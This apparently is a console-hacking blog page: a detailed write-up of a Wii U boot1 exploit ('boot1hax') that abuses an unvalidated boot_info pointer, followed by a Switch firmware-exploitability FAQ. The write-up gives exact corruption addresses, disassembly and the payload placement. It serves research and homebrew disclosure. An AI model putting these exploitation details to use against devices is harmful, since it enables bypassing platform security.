This was definitely one of the most fun exploits I ever worked on, but the absolute best part was having the opportunity to develop it alongside such talented individuals as plutoo, SciresM and many others.
Working on this was a blast and knowing how long it managed to remain unpatched was surprisingly amusing.

As promised, an updated version of this exploit chain written for firmware versions 4.1.0, 5.x and 6.0.0 will be progressively merged into the PegaSwitch project.

As usual, have fun!

Sunday, January 14, 2018

Anatomy of a Wii U: The End...?

Welcome to a new write-up! Last time I wrote one of these was months ago, but I had good reasons for that (*cough*Switch*cough*).

Since as early as March, I've been working non-stop on hacking and reverse engineering the Switch alongside extremely talented hackers/developers such as plutoo, derrek, yellows8 and SciresM.
Together we have achieved incredible milestones and I'm really glad all our hard work eventually paid off.

That said, let's move on to the reason for this post: the Wii U.
If you are one of those few enthusiasts that still care about this console, you might recall last year's CCC where derrek, naehrwert and nedwill showcased their progress in hacking the last bits of the 3DS and Wii U.
Back then, they demonstrated their own exploitation path for taking down both the PPC and ARM processors on the Wii U, something that had already been publicly achieved using different bugs/exploits. This had also been achieved much earlier by the hacking group fail0verflow, which showcased their findings during the 30th edition of the CCC (back in 2013).

It was a very cool talk all around, but the main highlight for Wii U hacking fans was something derrek brought up: boot1.
This particular piece of the Wii U's boot chain had never been obtained until derrek and his team (plutoo, yellows8, smealum and naehrwert) successfully launched a hardware-based attack that resulted in dumping the boot1 key.
The setup for this attack remained private, but the overall exploitation process was explained during the talk and is also documented here: http://wiiubrew.org/wiki/Wii_U_System_Flaws#boot0

That was the last nail in the Wii U's coffin... or was it? Naturally, after obtaining the boot1 binary, derrek and his team began looking for vulnerabilities in it. While most of the usually critical stuff (signature handling, file parsing, etc.) was found to be safely implemented, derrek, plutoo, yellows8, naehrwert and shuffle2 did find one potential bug. However, due to lack of motivation and time, it remained just a theory.

I even wrote a blog post about all this where I mistakenly assumed some things that weren't true. Then I issued another blog post apologizing for said assumptions... Those were confusing times. :P
However, that's what got me to chat with derrek and get to know him better.

After some discussions about boot1, derrek agreed to share with me the potential bug that was mentioned during CCC. His team was already getting ready for the Switch release and they had little to no time left to work on trying to exploit this bug, so I offered my help.

A few days later I found a way to exploit this bug and achieved boot1 code execution! Neat, huh?
So, without further ado, I present you a writeup on the mythical boot1hax. :D

NOTE: Obtaining the boot1 binary in the first place is out of scope for the purposes of this writeup.

The Bug

The bug itself is really simple.
After some hours reverse engineering the boot1 binary and using the information derrek had shared with me, finding the bug was straightforward.
However, to understand it, we have to look into a specific IOSU process: IOS-MCP.

Wait, IOS-MCP? That loads AFTER boot1, what could possibly relate them?
Turns out, IOS-MCP manages something that plenty of people have already looked into (and maybe even guessed its purpose), but couldn't exactly understand what it does.

There is a range of physical memory mapped in IOSU that appears to serve no clear purpose: 0x10000000 to 0x100FFFFF (see http://wiiubrew.org/wiki/Physical_Memory).

The typical layout of this region is as follows:
0x10000000: 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
...
0x100003F0: 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
0x10000400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
...
0x10005A40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005A50: 00 00 00 00
0x10005A54: PRSH XOR checksum
0x10005A58: "PRSH" // magic
0x10005A5C: 0x00000001 // version (0 or 1)
0x10005A60: 0x0000259C // size
0x10005A64: 0x00000001 // unk
0x10005A68: 0x00000020 // max_sections
0x10005A6C: 0x00000007 // num_sections
... // PRSH sections
0x10007FF0: PRST XOR checksum
0x10007FF4: 0x0000259C // size
0x10007FF8: 0x00000001 // unk
0x10007FFC: "PRST" // magic
Breaking it down, we have a pattern filling the first 0x400 bytes followed by NULL bytes up until this PRSH/PRST structure:
typedef struct {
    char name[0x100];
    void* data;
    u32 size;
    u32 unk;
    u8 hash[0x14];
    u8 padding[0x0C];
} prsh_section;

typedef struct {
    u32 xor_checksum;
    u32 magic;
    u32 version;
    u32 size;
    u32 unk;
    u32 max_sections;
    u32 num_sections;
    prsh_section sections[];
} prsh;

typedef struct {
    u32 xor_checksum;
    u32 size;
    u32 unk;
    u32 magic;
} prst;
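A note on the xor_checksum fields in the header and footer: as far as I can tell, they are computed as a plain word-wise XOR over the covered region (the exact range being covered is my assumption here). A quick sketch:

```javascript
// Word-wise XOR checksum over a Uint32Array, as assumed for the
// PRSH/PRST structures (the exact covered range is an assumption).
function xorChecksum(words) {
    var sum = 0;
    for (var i = 0; i < words.length; i++)
        sum = (sum ^ words[i]) >>> 0;
    return sum;
}

// Illustrative word values only, not a real dump
var words = new Uint32Array([0x0000259C, 0x00000001, 0x54535250]);
console.log('0x' + xorChecksum(words).toString(16)); // 0x545377cd
```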
This structure is created by IOS-MCP to keep track of the addresses and sizes of several memory regions. It is encapsulated with a header (PRSH) and a footer (PRST) and contains an array of structures describing memory regions.
In the latest firmware version, only 7 regions are registered in this structure. Here's an example parsed from my console:
Name: "boot_info"
Address: 0x10008000
Size: 0x00000058
UNK: 0x80000000
Name: "mcp_crash_region"
Address: 0x100F7F60
Size: 0x000080A0
UNK: 0x80000000
Name: "mcp_syslog_region"
Address: 0x1FF7FFD0
Size: 0x00080030
UNK: 0x80000000
Name: "mcp_fs_cache_region"
Address: 0x100D7EE0
Size: 0x00020080
UNK: 0x80000000
Name: "mcp_ramdisk_region"
Address: 0x100B7494
Size: 0x0000006C
UNK: 0x80000000
Name: "mcp_list_region"
Address: 0x1FE62C40
Size: 0x0011D390
UNK: 0x80000000
Name: "mcp_launch_region"
Address: 0x100B645C
Size: 0x00001038
UNK: 0x80000000
While most of these regions contain nothing particularly interesting, there is one exception: boot_info.
This region stores data passed along from boot0 and boot1 to IOS-MCP! An example from my console:
0x00000000: 0x00000001 // Always 1 (set by boot1 on coldboot)
0x00000004: 0xA6000000 // Boot flags (0x80 means data is set)
0x00000008: 0x00000000 // Boot state
0x0000000C: 0x00000001 // Boot count (increased by boot1 on reset)
0x00000010: 0x00100000 // Set to 0 by boot1 on coldboot
0x00000014: 0x00000000 // Set to 0 by boot1 on coldboot
0x00000018: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
0x0000001C: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
0x00000020: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
0x00000024: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
0x00000028: 0xFFFFFFFF // Set to -1 by boot1 on AHB reset
0x0000002C: 0xFFFFFFFF // Set to -1 by boot1 on AHB reset
0x00000030: 0x00000000 // Set to 0 by boot1 on AHB reset
0x00000034: 0x00000000 // Set to 0 by boot1 on AHB reset
0x00000038: 0x00369F6B // boot1_main
0x0000003C: 0x00297268 // boot1_read
0x00000040: 0x0005FCFE // boot1_verify
0x00000044: 0x00053CE8 // boot1_decrypt
0x00000048: 0x00012030 // boot0_main
0x0000004C: 0x000029D2 // boot0_read
0x00000050: 0x0000D281 // boot0_verify
0x00000054: 0x0000027A // boot0_decrypt
As an example, the last 8 fields contain the time spent on each boot0/boot1 stage and this data is printed on crash logs.

What derrek and his team found out by looking at the boot1 binary is that this structure is also passed back to boot1!
How? Well, right before a reset is asserted, IOS-MCP encrypts the entire 0x10000400 to 0x10008000 range with the Starbuck ancast key. When the console reboots, RAM contents are not cleared and boot1 will decrypt this range and parse the PRSH/PRST struct looking for the boot_info region.

Even though this might look like a weird way to pass data back and forth across the boot chain, this process is actually properly implemented and boot1's code for parsing the PRSH/PRST structure is sound. But there is one exception...

On coldboot, where the RAM contents are cleared, it's boot1 that creates boot_info for the first time at the hardcoded address 0x10008000 and inserts this information into the PRSH/PRST structure. However, on a warmboot, boot1 decrypts and parses the already existing PRSH/PRST structure in RAM, which might have been changed by IOS-MCP. This means that boot1 actually locates the boot_info section inside the PRSH/PRST structure and uses the pointer stored there to read/write the actual data.

This shouldn't be a problem, but they forgot to validate the pointer to boot_info data, which means that if IOS-MCP changes it, boot1 will attempt to read/write the boot_info data from any address we want (instead of 0x10008000)!

What derrek and his team were able to verify is that changing the pointer for boot_info to an address within boot1's stack region would crash boot1. A plausible exploitation path here would be to take advantage of whatever boot1 writes into boot_info to overwrite some LR address stored in boot1's stack and gain code execution.
Unfortunately, this is very impractical. Turns out, the way boot_info is parsed and modified by boot1 is very, very restricted.

The Exploit

So, we have this weird small structure that boot1 uses to communicate with IOSU (and vice versa) and we can control the pointer for said structure to force boot1 to read it from anywhere we want. The only way to tell if this can be exploited or not is to know exactly why this boot_info structure exists and how boot1 handles it, so I'm going to cheat and jump straight to a breakdown of how it's done:
// Do some boring stuff
...

// Decrypt PRSH/PRST with the Starbuck ancast key
sub_D400320(0x10000400, 0x7C00, iv);

// Parse PRSH/PRST
sub_D40B030(0x10000400, 0x7C00);

// Locate or create a new "boot_info"
sub_D40AF10(0);

// RTC SLEEP_EN is raised
if ((rtc_events & 0x01E00001) == 0x00200000)
{
    *(u32 *)boot_info_08_addr = 0;
    
    // Read from boot_info + 0x08
    u32 result = sub_D40AB84(boot_info_08_addr);
    
    // Got boot_info_08
    if (result == 0)
    {
        u32 boot_info_08 = *(u32 *)boot_info_08_addr;
        rtc_events |= (boot_info_08 & 0x101E);
    }
}
else
{
    // Mask boot_info_04 with 0xBFFFFFFF
    sub_D40AE4C();
    // Mask boot_info_04 with 0xF7FFFFFF and set some other fields
    sub_D40AC7C();
}

// Set boot_info_08
sub_D40AC30(rtc_events);

// Do even more boring stuff
...

// Write the stage timings to boot_info_38 through boot_info_54
sub_D40AD2C(0x00, time_boot1);
sub_D40AD2C(0x01, time_boot1_load_fw);
sub_D40AD2C(0x02, time_boot1_verify_fw);
sub_D40AD2C(0x03, time_boot1_decrypt_fw);
sub_D40AD2C(0x04, time_boot0);
sub_D40AD2C(0x05, time_boot0_load_boot1);
sub_D40AD2C(0x06, time_boot0_verify_boot1);
sub_D40AD2C(0x07, time_boot0_decrypt_boot1);

// Set flag 0x04000000 in boot_info_04
sub_D40ABCC();

// Increase boot_info_0C by 1
sub_D40AEB0();

// Run fw.img
...
As you can see, there's not much going on. The PRSH/PRST structure is decrypted from RAM and boot1 tries to locate boot_info inside it. If it fails, a new boot_info entry is created and inserted into the PRSH/PRST structure, but the pointer for its data will be hardcoded to 0x10008000, thus causing any subsequent reads/writes to occur in a perfectly safe address range. However, if it does find a preexisting boot_info entry, boot1 will fetch its data from the pointer stored inside the PRSH/PRST structure, and this is what we are interested in causing.

The attack plan is simple:
  • Use any exploit we want and escalate to IOS-MCP (or even better, to the IOSU kernel);
  • Craft/modify the PRSH/PRST structure in memory using a modified boot_info pointer;
  • Encrypt the PRSH/PRST structure with the Starbuck ancast key and boot_info IV (stored at 0x050677C0 in IOS-MCP);
  • Force a reboot.

As expected, we can force boot1 to take a modified boot_info pointer and start reading the data from anywhere we want. Now comes the real challenge: where should we point to?

We must focus on the boot_info fields that are always modified by boot1, but we also need to take into account how boot1 tells if boot_info already exists or not. This happens in sub_D40AF10 and it goes like this:
  • Each PRSH/PRST section is parsed and its name is compared against the string "boot_info";
  • If the boot_info section is found, its size is checked and it must be 0x58;
  • Finally, the boot_info_04 field must have bit 0x80 (big endian) set.

This last check is very important since boot1 only accepts a preexisting boot_info structure if the word at offset 0x04 has that specific bit set.
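Putting the three checks together, boot1's acceptance test boils down to something like this (reconstructed logic for illustration, not boot1's actual code):

```javascript
// Sketch of sub_D40AF10's acceptance checks for an existing
// boot_info section (reconstructed logic, not boot1's actual code).
function acceptBootInfo(section, bootInfo04) {
    if (section.name !== 'boot_info')
        return false;               // name must match exactly
    if (section.size !== 0x58)
        return false;               // size must be exactly 0x58
    // "bit 0x80 (big endian)" means the top bit of the most
    // significant byte of the big-endian word at offset 0x04
    return (bootInfo04 & 0x80000000) !== 0;
}

console.log(acceptBootInfo({ name: 'boot_info', size: 0x58 }, 0x93469D47)); // true
console.log(acceptBootInfo({ name: 'boot_info', size: 0x58 }, 0x13469D47)); // false
```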

It's now clear that we can achieve a semi-arbitrary write in boot1 by abusing this particular bug. All we need is to change the boot_info pointer inside our crafted PRSH/PRST into something that resembles a valid boot_info structure from boot1's point of view. This would then result in boot1 updating those boot_info fields listed before and, therefore, write data to an arbitrary address.

Let's leave the "boot_info_04 field must have bit 0x80 set" aside for a while and focus on which fields might be useful to write into boot1's address space:
  • boot_info_08: this is only modified by boot1 when a specific RTC event has occurred.
  • boot_info_38 to boot_info_54: these are used to store the time spent on the various boot0/boot1 stages.
  • boot_info_0C: this is increased by 1 each time a warmboot occurs (gets set back to 0 on a coldboot).

To be more precise, there are indeed a few more fields that are modified by boot1, but these are always set to either 0 or -1, which doesn't make them very practical choices.

I began by focusing on the time related fields, but these just turned out to be too volatile for a reliable memory corruption. Also, boot_info_0C is not really useful either since it keeps changing on each warmboot.
What about boot_info_08? For this field to be read/written the RTC must have the SLEEP_EN flag set. Luckily, we can just force this flag to be set by calling the system call ios_shutdown(1) (see http://wiiubrew.org/wiki/Syscalls) which also happens to trigger a system reset!

Still, boot_info_08 will be overwritten with rtc_events |= (boot_info_08 & 0x101E). From blind tests, I could tell the final value that got written was always 0x0020XXXX, which means I could write a NULL byte followed by 0x20 and whatever was in the lower bits of boot_info_08. This is far from optimal... :\

It took me about two afternoons of reading boot1's binary until I finally found the perfect place to corrupt:
0D40AC6C MOVS R0, #0
0D40AC6E POP {R1-R3}
0D40AC70 MOV R11, R2
0D40AC72 MOV SP, R3
0D40AC74 BX R1

This particular snippet is the epilogue of sub_D40AC30, which runs immediately after boot_info_08 is modified. Doesn't look particularly interesting, but let's check the hex:
0D40AC6C 20 00 BC 0E 46 93 46 9D 47 08 00 00
Jackpot! Since this code runs long before the MMU is set up, unaligned memory reads/writes work just fine. So, if I change the boot_info pointer to 0x0D40AC6D, boot1 will see the following structure:
  • boot_info_00: 0x00BC0E46 
  • boot_info_04: 0x93469D47
  • boot_info_08: 0x080000XX 

Since boot_info_04 has bit 0x80 (big endian) set, boot1 will overwrite boot_info_08 with 0x0020XXXX. Why is this important? Because that write mutates the instruction BX R1 into BX R0, and R0 is 0 thanks to the MOVS R0, #0 at the start of the epilogue.
This means boot1's execution will fall into NULL. Normally this isn't very exciting, but in the Wii U's case the physical address range 0x00000000 to 0x01FFFFFF maps to MEM1 (which is frequently used for graphics).

This memory range is not cleared on a warmboot either so, as long as boot0 and boot1 leave it alone, we can actually plant our payload there and have arbitrary code execution going!

It's known that boot0 doesn't touch any relevant RAM regions, but what about boot1? Well, boot1 actually accesses all three RAM regions (MEM0, MEM1 and MEM2):
  • MEM0 is fully cleared by boot1 as soon as it starts;
  • MEM2 is left untouched, with the exception of the first 0x400 bytes at address 0x10000000 which are filled with a binary pattern for testing RAM self-refresh;
  • MEM1 is also left untouched, with the exception of a single word (0x20008000) being written at address 0x0000000C for unknown reasons.

As long as our payload starts right away with a jump over address 0x0000000C, we are good!

So, I cooked up a small payload to copy boot1 from SRAM into an unused MEM2 region, patch the corruption I just caused, jump back to where execution fell into NULL and let boot1 finish. Now I just needed to escalate into IOS-MCP or IOSU's kernel and fish out the binary!

As a bonus, this particular method allows me to hijack execution before the 2 mysterious OTP blocks get locked (see http://wiiubrew.org/wiki/Hardware/OTP) so I can easily piggyback on boot1's OTP reading functions and get them too!
Sadly, these blocks are never used and were likely locked out as a preemptive measure so a future update could begin to use them instead of some other key material (especially since the 2 blocks are not per-console). 

And there you have it, boot1 code execution from a RAM based attack!
Along with this writeup, I'll be publicly documenting boot1 over at http://wiiubrew.org and I'm releasing a patch for my long forgotten project hexFW that gives you the option to dump your console's boot1 and unlocked OTP: https://github.com/hexkyz/hexFW/commit/f52f85f683dfcef0544f8ddb3643cef5cfa2ee86

NOTE: This does not include the boot1 AES key, since that one is long gone by the time we are running code in boot1!

What about CFW? Well, this attack on its own doesn't really help you there.
In order to get a custom firmware running straight from boot1, another kind of attack is preferred, especially something that actually survives a coldboot. :\
Remember that this only works because RAM isn't cleared on a warmboot, so it's impossible to achieve persistence this way.

However... There's one plausible vector that could be used to create a much safer alternative to current methods.
Leveraging this bug from the vWii environment, for example, could grant a nice boot(ish)-time CFW: combined with some form of contenthax, entering vWii mode would launch the boot1hax payload, reset the console and send you right into a CFW. The total time spent on this would be minimal and it would create a dual-boot environment where you could hold down the "B" button on boot to jump into CFW or do nothing to land on the vanilla OS. That is, of course, if you don't mind sacrificing your vWii channel for a while (it could later be restored from within the CFW environment, so that's not really an issue).

I've been looking into this for quite some time with derrek, but the Switch has been taking most of our time so I kept postponing this project endlessly. Regardless, I still plan on picking this up one last time during the start of this new year, but derrek and I agreed on sharing this anyway so others can also get the chance to research boot1 and hopefully find some new bugs in the process.

All this has been kept under wraps for quite a while for a very good reason: it's insanely easy to patch. Now that the Wii U has reached its EoL and the Switch is the new kid on the block, it seems appropriate to end (for good) the Wii U cycle while homebrew on the Switch is just beginning to flourish.

Retail plaintext boot1 (v8377) SHA-256: 5013BFABC578CBA08843D9A0F650171942A696CBC54DF12E754D9E0978FCD3B1

I hope you enjoyed reading this as much as I did writing it. :)
Stay safe and have fun!

Saturday, January 13, 2018

The Switch - State of Affairs

Let's kick off the new year with a new blog post!

Since last year's CCC talk, where derrek, naehrwert and plutoo showcased their progress on hacking the Switch, tons of misinformation have been floating around about which firmware is necessary for homebrew.
I believe it's now time to put up a nice and comprehensive FAQ on all things Switch hacking related.
So, buckle up, and if you have the questions, here are the answers.


Q: Who the hell are you and why should I take your answers seriously?
A: I've been working on hacking the Switch since day 1. I found bugs and developed exploits on my own at first and eventually ended up joining a small, loose crew of hackers who share the same interests. While we work together on a certain level, we also work either individually or among other groups (Switchbrew, ReSwitched, etc.).

Q: Were you involved in 34c3?
A: Not directly. Just like many others who were credited during the talk, I've worked with derrek, naehrwert and plutoo on hacking the Switch, but what was presented during the talk is a reflection of these hackers' separate work.

Q: I have been told for quite a while that firmware 3.0.0 is where I should be at. They even said so during the talk! What does that mean?
A: Firmware 3.0.0 introduced a specific bug that allowed for userland code execution, but that bug was patched immediately in the next firmware update. This created the perfect starting point for publicly disclosing the vulnerability and laying down the foundations of homebrew.
The idea was simple: get as many people as possible on firmware 3.0.0 so everybody could start writing homebrew right away. What wasn't particularly clear is that this is ultimately advice for homebrew developers and not the average end user.

Q: And what about [insert firmware version here]?
A: Here's something that you probably don't know yet: ALL current firmware versions are exploitable up to the point of running your own code.
Yes, you read that right. This includes firmware 1.0.0 all the way up to 4.1.0.

Q: So, can I just update my Switch?
A: Yes and no. This is a question many have been asking and conflicting answers are causing a great deal of confusion among people.
The basic principle is the following: if you have no reason to upgrade from your current firmware version (regardless of what it is), then simply don't upgrade.

However, the real answer is quite a bit more nuanced. Newer firmware versions obviously include additional patches for a myriad of vulnerabilities; therefore, the lowest firmware version (1.0.0) is the most vulnerable. Naturally, for a number of reasons, not everybody will be able to get their hands on a launch day system, so there's always interest in exploiting new updates.

In an effort to clear the air and promote a less toxic environment, here comes the current state of affairs regarding Switch hacks:
- Firmware 1.0.0:
-> Contains critical system flaws that allow code execution up to the TrustZone level;
-> Most of what was showcased during 34c3 originally targeted this firmware version;
-> Allows for a full blown emuNAND/CFW setup.

- Firmware 2.0.0-2.3.0:
-> Contains system flaws that allow code execution up to the kernel level;
-> Can be exploited to run homebrew using private methods (e.g.: nvhax).

- Firmware 3.0.0:
-> Contains system flaws that allow code execution on the userland level;
-> Can be exploited to run homebrew using private methods (e.g.: nvhax);
-> Can be exploited to run homebrew using public methods (e.g.: rohan).

- Firmware 3.0.1-4.1.0:
-> Contains system flaws that allow code execution on the userland level;
-> Can be exploited to run homebrew using private methods (e.g.: nvhax).

As you can see, the higher the firmware version, the less options you have. However, code execution for homebrew is still assured across all firmware versions.

Q: Wait, did I read that right? Firmware 2.0.0 to 2.3.0 can be exploited up to the kernel?
A: Yes, but no additional information will be disclosed at this point.

Q: What is that nvhax thing?
A: This is currently a private method that I originally discovered and exploited. Joined by SciresM and plutoo, we have successfully used it to exploit pretty much all firmware versions to the point where running homebrew is possible.

Q: Will nvhax be released? When?
A: Yes, but there are no plans to release it any time soon. Having code execution on the latest firmware version available is a privilege that ought to be maintained for as long as possible.
That said, when it stops being useful it will be released as an alternative for people on firmware versions above 3.0.0 to enjoy homebrew.

Q: Ok, so, I'm a developer with a strong passion for homebrew and would love to start right away. What do you suggest?
A: Update your Switch to firmware version 3.0.0, read about rohan and get to work!

Q: Now, I'm just a regular user that loves homebrew, but has no intent or knowledge to develop my own. I also want to play the latest games on my Switch and don't really mind waiting. What do you suggest?
A: Update to the latest firmware version and wait.

Q: What if I'm an avid hacker/developer who wants to explore the system as much as possible?
A: Find a 1.0.0 unit and stay there.

Q: And what if I just want to pirate games?
A: You're barking up the wrong tree.

Hopefully this FAQ will put to rest some of the doubts people have been expressing lately and help them understand the necessary steps to enjoy homebrew on their consoles.
More information will be shared when the time is right, but rest assured we are all working hard on really cool stuff and, hopefully, helping to build a strong homebrew community for the Switch.

Also, stay tuned for a very special blog post in the following days. ;)

As always, have fun!